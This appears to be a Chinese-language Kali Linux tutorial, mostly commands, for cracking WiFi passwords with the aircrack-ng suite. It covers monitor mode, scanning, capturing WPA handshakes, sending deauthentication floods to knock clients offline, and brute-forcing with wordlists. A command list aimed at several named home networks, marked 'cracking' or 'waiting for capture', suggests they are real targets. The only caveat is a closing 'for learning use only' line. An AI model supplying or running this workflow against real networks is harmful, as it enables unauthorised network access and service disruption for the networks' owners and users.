kali-linux操作系统的学习
一、下载VM虚拟机
二、下载安装kali操作系统镜像
点击跳转下载:清华大学开源软件镜像站
三、获取Wifi流程
1.查看网卡是否支持监听功能
airmon-ng
2.开启网卡监听功能
airmon-ng start wlan0
3.关闭网卡监听功能
airmon-ng stop wlan0mon
4.指定网卡扫描附件wifi
airodump-ng wlan0mon
5.复制要的wifi bssid(MAC地址)和 ch 信道
6.抓取握手包
解释下:
-c 信道
-bssid 服务端MAC地址
-w 握手包保持位置 默认当前目录
-网卡名称(可能会是wlan0或者wlan0mon,用ifconfg查看)
airodump-ng -c 11 --bssid xxxxxxxx -w HUAWEI-A1C6GU wlan0mon
6.如果抓取不到,就向服务端发送反认证包踢对方下线,然后重新连接WIFI的时候抓取握手包(路由器)
使用sudo -i 获取管理员权限
-0 是数字零,不是O,强制客户端断开与路由器的连接
50攻击次数
-a bssid 服务端的Mac地址
-c 客户端的MAC地址
wlan0mon 网卡名称
aireplay-ng -0 50 -a xx:xx:xx:xx:xx.xx -c xx:xx:xx:xx:xx.xx wlan0mon
`如果出现了:[ WPA handshake: xxxxxxxx 就是抓包成功直接开始
7.抓取到握手后,穷举WIFI密码
解释:
-w /home/桌面/手机号密码字典.txt 指定密码字典
-b xxxxxxxxx wifi的bssid
handshacke*.cap 握手包(.cap文件存储了密码,*是通配符)
aircrack-ng -w /home//桌面/rockyou.txt -b xx:xx:xx:xx:xx.xx HUAWEI-A1C6GU*.cap
四、命令版
命令版
#1.查看网卡是否支持监听功能
airmon-ng
#2.开启网卡监听功能
airmon-ng start wlan0
关闭网卡监听功能
airmon-ng stop wlan0mon
#3.指定网卡扫描附件wifi
airodump-ng wlan0mon
#4.复制要的wifi bssid(MAC地址)和 ch 信道
xxxxxxxxxxx 13 MERCURY_6B8E
#5.抓取握手包
airodump-ng -c 11 --bssid xxxxxxxxxxxxxxx -w HUAWEI-A1C6GU wlan0mon
airodump-ng -c 13 --bssid xxxxxxxxxxxxxxx -w MERCURY_6B8E wlan0mon
#6.发送反认证包
aireplay-ng -0 50 -a xxxxxxxxxxxxxxx -c xxxxxxxxxxxxxxx wlan0mon
--HUAWEI-A1C6GU 破解中。。。
aireplay-ng -0 50 -a xxxxxxxxxxxxxxx -c xxxxxxxxxxxxxxx wlan0mon --MERCURY_6B8E 破解中。。。
aireplay-ng -0 50 -a xxxxxxxxxxxxxxx -c xxxxxxxxxxxxxxx wlan0mon --TP-LINK_A877 待抓包。。。
#7.穷举WIFI密码
aircrack-ng -w /home/桌面/rockyou.txt -b xxxxxxxxxxxxxxx HUAWEI-A1C6GU*.cap
aircrack-ng -w /home/桌面/rockyou.txt -b xxxxxxxxxxxxxxx MERCURY_6B8E*.cap
aircrack-ng -w /home/桌面/rockyou.txt -b xxxxxxxxxxxxxxx TP-LINK_A877*.cap
仅供学习使用